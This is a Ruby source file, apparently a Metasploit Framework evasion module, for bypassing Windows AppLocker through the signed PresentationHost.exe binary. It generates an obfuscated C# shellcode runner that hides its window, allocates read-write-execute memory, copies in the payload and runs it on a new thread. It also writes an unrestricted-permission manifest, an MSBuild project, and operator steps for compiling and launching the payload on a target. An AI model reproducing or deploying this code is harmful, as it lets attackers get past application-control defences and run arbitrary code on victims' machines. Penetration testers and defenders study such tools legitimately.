GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/evasion/windows/applocker_evasion_presentationhost.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
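class MetasploitModule < Msf::Evasion

  # Suffixes the three generated files must carry for the MSBuild project to
  # pick them up; create_files appends them when the operator omitted them.
  CS_SUFFIX = '.xaml.cs'.freeze
  MANIFEST_SUFFIX = '.manifest'.freeze
  CSPROJ_SUFFIX = '.csproj'.freeze

  # Registers module metadata and the three filename options. The FILEFORMAT
  # mixin's FILENAME option is removed because this module writes three files
  # and names each one itself through file_format_filename.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Applocker Evasion - Windows Presentation Foundation Host',
        'Description' => %q{
          This module will assist you in evading Microsoft
          Windows Applocker and Software Restriction Policies.
          This technique utilises the Microsoft signed binary
          PresentationHost.exe to execute user supplied code.
        },
        'Author' => [
          'Nick Tyrer <@NickTyrer>', # module development
          'Casey Smith' # presentationhost bypass research
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => [ARCH_X86],
        'Targets' => [['Microsoft Windows', {}]]
      )
    )

    register_options(
      [
        OptString.new('CS_FILE', [true, 'Filename for the .xaml.cs file (default: presentationhost.xaml.cs)', 'presentationhost.xaml.cs']),
        OptString.new('MANIFEST_FILE', [true, 'Filename for the .manifest file (default: presentationhost.manifest)', 'presentationhost.manifest']),
        OptString.new('CSPROJ_FILE', [true, 'Filename for the .csproj file (default: presentationhost.csproj)', 'presentationhost.csproj'])
      ]
    )

    deregister_options('FILENAME')
  end

  # Base64-encodes the encoded payload so it can be embedded as a plain C#
  # string literal in the generated source.
  #
  # @return [String] base64 text
  def build_payload
    Rex::Text.encode_base64(payload.encoded)
  end

  # A random 8-letter token used as a C# identifier in the generated source.
  # Letters only, so the token is always a legal identifier start.
  #
  # @return [String]
  def obfu
    Rex::Text.rand_text_alpha(8)
  end

  # Renders the C# source that MSBuild compiles. The generated program hides
  # its own console window (ShowWindow with nCmdShow 0, i.e. SW_HIDE),
  # base64-decodes the payload, copies it into a buffer obtained from
  # VirtualAlloc with the two constants 0x1000 / 0x40 (the usual
  # MEM_COMMIT / PAGE_EXECUTE_READWRITE values) and runs that buffer on a new
  # thread, waiting 0xFFFFFFFF ms (forever) for it to exit. Every identifier
  # is randomised per invocation; the kernel32/user32 P/Invoke imports are the
  # part that does not change between runs.
  #
  # @return [String] C# source text
  def presentationhost_xaml_cs
    esc = build_payload
    mod = random_identifiers(11)
    <<~HEREDOC
      using System;
      class #{mod[0]}{
      static void Main(string[] args){
      IntPtr #{mod[1]};
      #{mod[1]} = GetConsoleWindow();
      ShowWindow(#{mod[1]}, #{mod[2]});
      string #{mod[3]} = "#{esc}";
      byte[] #{mod[4]} = Convert.FromBase64String(#{mod[3]});
      byte[] #{mod[5]} = #{mod[4]};
      IntPtr #{mod[6]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[5]}.Length, #{mod[7]}, #{mod[8]});
      System.Runtime.InteropServices.Marshal.Copy(#{mod[5]}, 0, #{mod[6]}, #{mod[5]}.Length);
      IntPtr #{mod[9]} = IntPtr.Zero;
      WaitForSingleObject(CreateThread(#{mod[9]}, UIntPtr.Zero, #{mod[6]}, #{mod[9]}, 0, ref #{mod[9]}), #{mod[10]});}
      private static Int32 #{mod[7]}=0x1000;
      private static IntPtr #{mod[8]}=(IntPtr)0x40;
      private static UInt32 #{mod[10]} = 0xFFFFFFFF;
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
      [System.Runtime.InteropServices.DllImport("user32.dll")]
      static extern bool ShowWindow(IntPtr #{mod[1]}, int nCmdShow);
      [System.Runtime.InteropServices.DllImport("Kernel32")]
      private static extern IntPtr GetConsoleWindow();
      const int #{mod[2]} = 0;}
    HEREDOC
  end

  # Renders the application manifest. It requests an Unrestricted permission
  # set and asInvoker execution level, so the compiled application runs with
  # the launching user's privileges and without a UAC prompt.
  #
  # @return [String] XML manifest text
  def presentationhost_manifest
    <<~HEREDOC
      <?xml version="1.0" encoding="utf-8"?>
      <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
      <assemblyIdentity version="1.0.0.0" name="MyApplication.app" />
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
      <security>
      <applicationRequestMinimum>
      <defaultAssemblyRequest permissionSetReference="Custom" />
      <PermissionSet class="System.Security.PermissionSet" version="1" ID="Custom" SameSite="site" Unrestricted="true" />
      </applicationRequestMinimum>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
      <requestedExecutionLevel level="asInvoker" uiAccess="false" />
      </requestedPrivileges>
      </security>
      </trustInfo>
      </assembly>
    HEREDOC
  end

  # Renders the MSBuild project. HostInBrowser/GenerateManifests make the
  # build produce the browser-hosted (.xbap) output that the instructions
  # hand to PresentationHost.exe; the Compile/None items reference the
  # CS_FILE and MANIFEST_FILE names, so those datastore values must already
  # be final when this is called (create_files guarantees that).
  #
  # @return [String] csproj XML text
  def presentationhost_csproj
    <<~HEREDOC
      <?xml version="1.0" encoding="utf-8"?>
      <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
      <Import Project="$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\\$(MSBuildToolsVersion)\\Microsoft.Common.props')" />
      <PropertyGroup>
      <Configuration Condition=" '$(Configuration)' == '' ">Release</Configuration>
      <Platform Condition=" '$(Platform)' == '' ">x86</Platform>
      <OutputType>WinExe</OutputType>
      <HostInBrowser>true</HostInBrowser>
      <GenerateManifests>true</GenerateManifests>
      <SignManifests>false</SignManifests>
      </PropertyGroup>
      <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x86' ">
      <Optimize>true</Optimize>
      <OutputPath>.</OutputPath>
      </PropertyGroup>
      <ItemGroup>
      <Reference Include="System" />
      </ItemGroup>
      <ItemGroup>
      <Compile Include="#{datastore['CS_FILE']}">
      <DependentUpon>#{datastore['CS_FILE']}</DependentUpon>
      <SubType>Code</SubType>
      </Compile>
      </ItemGroup>
      <ItemGroup>
      <None Include="#{datastore['MANIFEST_FILE']}" />
      </ItemGroup>
      <Import Project="$(MSBuildToolsPath)\\Microsoft.CSharp.targets" />
      </Project>
    HEREDOC
  end

  # Getter/setter consulted by file_create for the output filename. With a
  # non-empty +name+ it records that name and returns it; with no argument it
  # returns the name recorded last.
  #
  # @param name [String] filename to use for the next file_create, or '' to read
  # @return [String, nil] the current filename
  def file_format_filename(name = '')
    return @fname if name.empty?

    @fname = name
  end

  # Writes the three files. The normalised names are written back to the
  # datastore explicitly: presentationhost_csproj and instructions read them
  # from there, and the previous code only got the suffixed name into the
  # datastore through in-place mutation of the stored string (`f1 << '.xaml.cs'`),
  # which silently breaks if the datastore returns a copy or a frozen string,
  # and left an empty option empty, producing a csproj with an empty
  # Compile Include.
  def create_files
    cs_name = normalize_filename(datastore['CS_FILE'], 'presentationhost.xaml.cs', CS_SUFFIX)
    manifest_name = normalize_filename(datastore['MANIFEST_FILE'], 'presentationhost.manifest', MANIFEST_SUFFIX)
    csproj_name = normalize_filename(datastore['CSPROJ_FILE'], 'presentationhost.csproj', CSPROJ_SUFFIX)

    datastore['CS_FILE'] = cs_name
    datastore['MANIFEST_FILE'] = manifest_name
    datastore['CSPROJ_FILE'] = csproj_name

    # Render only after the names are final so the csproj references the
    # same names that are written to disk.
    cs_file = presentationhost_xaml_cs
    manifest_file = presentationhost_manifest
    csproj_file = presentationhost_csproj

    file_format_filename(cs_name)
    file_create(cs_file)
    file_format_filename(manifest_name)
    file_create(manifest_file)
    file_format_filename(csproj_name)
    file_create(csproj_file)
  end

  # Prints the build and launch steps for the operator. The .xbap name is
  # derived from CS_FILE with a case-insensitive, end-anchored replacement so
  # a name such as 'Foo.XAML.CS' is handled too.
  #
  # NOTE(review): MSBuild names the output after the project file unless
  # AssemblyName is set, so when CS_FILE and CSPROJ_FILE have different
  # basenames the printed .xbap name is probably wrong — confirm.
  def instructions
    xbap = datastore['CS_FILE'].sub(/\.xaml\.cs\z/i, '.xbap')
    print_status "Copy #{datastore['CS_FILE']}, #{datastore['MANIFEST_FILE']} and #{datastore['CSPROJ_FILE']} to the target"
    print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\MSBuild.exe #{datastore['CSPROJ_FILE']}"
    print_status "Execute using: C:\\Windows\\System32\\PresentationHost.exe [Full Path To] #{xbap}"
  end

  # Module entry point: write the files, then print how to use them.
  def run
    create_files
    instructions
  end

  private

  # Returns +count+ distinct obfu tokens. A repeated token would give the
  # generated C# two identical identifiers and fail to compile; the union
  # assignment keeps only unique values.
  #
  # @param count [Integer] number of identifiers wanted
  # @return [Array<String>]
  def random_identifiers(count)
    names = []
    names |= [obfu] while names.size < count
    names
  end

  # Returns +value+ with +suffix+ appended when it does not already end with
  # it (compared case-insensitively), or +default+ when +value+ is nil or
  # blank. Never mutates +value+.
  #
  # @param value [String, nil] operator-supplied filename
  # @param default [String] name to use when +value+ is blank (already suffixed)
  # @param suffix [String] required extension
  # @return [String]
  def normalize_filename(value, default, suffix)
    name = value.to_s.strip.empty? ? default : value.to_s
    name.downcase.end_with?(suffix) ? name : name + suffix
  end
end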